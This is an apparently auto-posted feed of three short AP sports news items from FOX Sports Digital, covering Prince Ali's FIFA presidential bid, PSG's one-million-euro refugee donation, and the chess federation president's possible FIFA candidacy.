Prince Ali of Jordan announces bid for FIFA president

AMMAN, Jordan (AP) Prince Ali bin al-Hussein of Jordan is running for FIFA president, saying Wednesday he will fight ''deep-seated corruption and political deal-making'' and make soccer's scandal-scarred governing body more transparent.

from FOX Sports Digital http://ift.tt/1LXrrlr
via IFTTT

PSG to give 1 million euros to help tackle migrants crisis

PARIS (AP) Paris Saint-Germain will donate one million euros ($1.12 million) to the United Nations' refugee agency and a French non-profit association to help relieve the migrants crisis.

from FOX Sports Digital http://ift.tt/1NicNGV
via IFTTT

President of chess federation could run for FIFA president

MOSCOW (AP) An eccentric Russian politician who is the president of the World Chess Federation and claims to have visited an alien spaceship is thinking about running for FIFA president.

from FOX Sports Digital http://ift.tt/1XL7ULE
via IFTTT